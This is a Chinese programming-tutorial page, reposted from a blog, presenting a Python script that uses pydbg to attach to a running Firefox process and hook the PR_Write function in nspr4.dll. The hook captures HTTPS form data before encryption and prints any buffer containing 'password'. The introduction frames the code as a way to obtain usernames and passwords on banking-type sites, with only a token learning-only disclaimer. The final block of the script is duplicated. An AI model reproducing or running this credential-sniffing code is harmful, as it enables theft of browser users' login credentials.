python利用hook技术破解https的实例代码_python教程-查字典教程网
python利用hook技术破解https的实例代码
python利用hook技术破解https的实例代码
发布时间:2016-12-28 来源:查字典编辑
摘要:相对于http协议,http是的特点就是他的安全性,http协议的通信内容用普通的嗅探器可以捕捉到,但是https协议的内容嗅探到的是加密后...

相对于http协议,http是的特点就是他的安全性,http协议的通信内容用普通的嗅探器可以捕捉到,但是https协议的内容嗅探到的是加密后的内容,对我们的利用价值不是很高,所以一些大的网站----涉及到“大米”的网站,采用的都是http是协议,嘿嘿,即便这样,还是有办法能看到他的用户名和密码的,嘿嘿,本文只是用于技术学习,只是和大家交流技术,希望不要用于做违法的事情,这个例子是在firefox浏览器下登录https协议的网站,我们预先打开程序,就来了个捕获用户名和密码:

下面是源代码:

复制代码 代码如下:

#!/ur/bin/env python

from pydbg import *

from pydbg.defines import *

import utils

import sys

dbg = pydbg()

found_firefox = False

pattern = "password"

def ssl_sniff( dbg, args ):

buffer = ""

offset = 0

while 1:

byte = dbg.read_process_memory( args[1] + offset, 1 )

if byte != "x00":

buffer += byte

offset += 1

continue

else:

break

if pattern in buffer:

print "Pre-Encrypted: %s" % buffer

return DBG_CONTINUE

# 寻找firefox.exe的进程

for (pid, name) in dbg.enumerate_processes():

if name.lower() == "firefox.exe":

found_firefox = True

hooks = utils.hook_container()

dbg.attach(pid)

print "[*] Attaching to firefox.exe with PID: %d" % pid

# 得到firefox的hook的 address

hook_address = dbg.func_resolve_debuggee("nspr4.dll","PR_Write")

if hook_address:

# 添加hook的内容,包括他的pid,地址,嗅探类型

hooks.add( dbg, hook_address, 2, ssl_sniff, None )

print "[*] nspr4.PR_Write hooked at: 0x%08x" % hook_address

break

else:

print "[*] Error: Couldn't resolve hook address."

sys.exit(-1)

if found_firefox:

print "[*] Hooks set, continuing process."

dbg.run()

else:

print "[*] Error: Couldn't find the firefox.exe process."

sys.exit(-1)

if found_firefox:

print "[*] Hooks set, continuing process."

dbg.run()

else:

print "[*] Error: Couldn't find the firefox.exe process."

sys.exit(-1)

转自:http://world77.blog.51cto.com/414605/518679

相关阅读
推荐文章
猜你喜欢
附近的人在看
推荐阅读
拓展阅读
  • 大家都在看
  • 小编推荐
  • 猜你喜欢
  • 最新python学习
    热门python学习
    脚本专栏子分类